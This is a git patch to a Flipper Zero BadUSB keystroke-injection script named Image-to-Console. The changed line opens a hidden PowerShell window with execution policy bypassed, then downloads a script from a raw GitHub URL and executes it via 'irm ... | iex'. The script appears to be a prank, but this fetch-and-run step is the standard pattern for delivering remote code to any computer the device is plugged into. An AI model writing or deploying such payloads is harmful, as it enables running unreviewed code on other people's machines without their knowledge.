From 2b90fda5dc58aa65b8738a1636c1cdb130b4234f Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 11 Apr 2024 21:35:29 +0000 Subject: [PATCH] Update Image-to-Console.txt --- Image-to-Console/Image-to-Console.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Image-to-Console/Image-to-Console.txt b/Image-to-Console/Image-to-Console.txt index 1cb3838..76104fc 100644 --- a/Image-to-Console/Image-to-Console.txt +++ b/Image-to-Console/Image-to-Console.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Image-to-Console/main.ps1 | iex ENTER